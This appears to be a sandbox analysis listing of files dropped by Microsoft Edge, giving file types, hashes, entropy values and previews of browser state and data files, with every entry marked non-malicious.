                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):6820
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.79677976901955
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:iaqkHfcLH5ih/cI9URLl8RotoXjMFVvlwhVe4IbONIeTC6XQS0qGqk+Z4uj+rjEy:akkLQeiRUwh36qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                  MD5:9FFA045A1A5A1B62A10E13DE11E32190
                                                                                                                                                                                                                                                                                  SHA1:87C0AB16C985AEEBF52E3B278A963D834AE2E677
                                                                                                                                                                                                                                                                                  SHA-256:109C19B042BC520193448774ED077A00D228357EF954FC581B21AEDC284494FA
                                                                                                                                                                                                                                                                                  SHA-512:74473F8D35EA2B20D21EEB9BB7680D88840FB72E13DA1D9C4AEDC21856176CCD1A22B87BE88DA43A250085198DB6746C27EBFF021F653BE631D9C44D3A8FBAD8
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABcnR0lPmWCTIn8SLWyo3pfEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAACElbBPbJUdz3hJPxEEYx4aEJx0JYJ7RPnh5jKMBQMVYwAAAAA
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                  MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                  SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                  SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                  SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNleGG:Ls3Z
                                                                                                                                                                                                                                                                                  MD5:E375FA258BE65576ECAA84C96354C50F
                                                                                                                                                                                                                                                                                  SHA1:D80FC2450FDE1AEE361D6EFFD4590FC2096115D9
                                                                                                                                                                                                                                                                                  SHA-256:1E1591A4E38746880EA6558A33D3DC8CA8E5DECF7E0986E393A83C1C10B978F3
                                                                                                                                                                                                                                                                                  SHA-512:76A91BCC44C716AEC52F531C2305B5338FCABFE0EFFD964ADF580BFE8DFC5D8E81F18931607D9B926B9D87B5A66342FD5C20B4720EC5EEF80390F5E29745A1FB
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.........................................}#k./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                  MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                  SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                  SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                  SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):35
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                  MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                  SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                  SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                  SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.922828737239167
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                                                                                                                                  MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                                                                                                                                  SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                                                                                                                                                  SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                                                                                                                                  SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:customSynchronousLookupUris_0
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
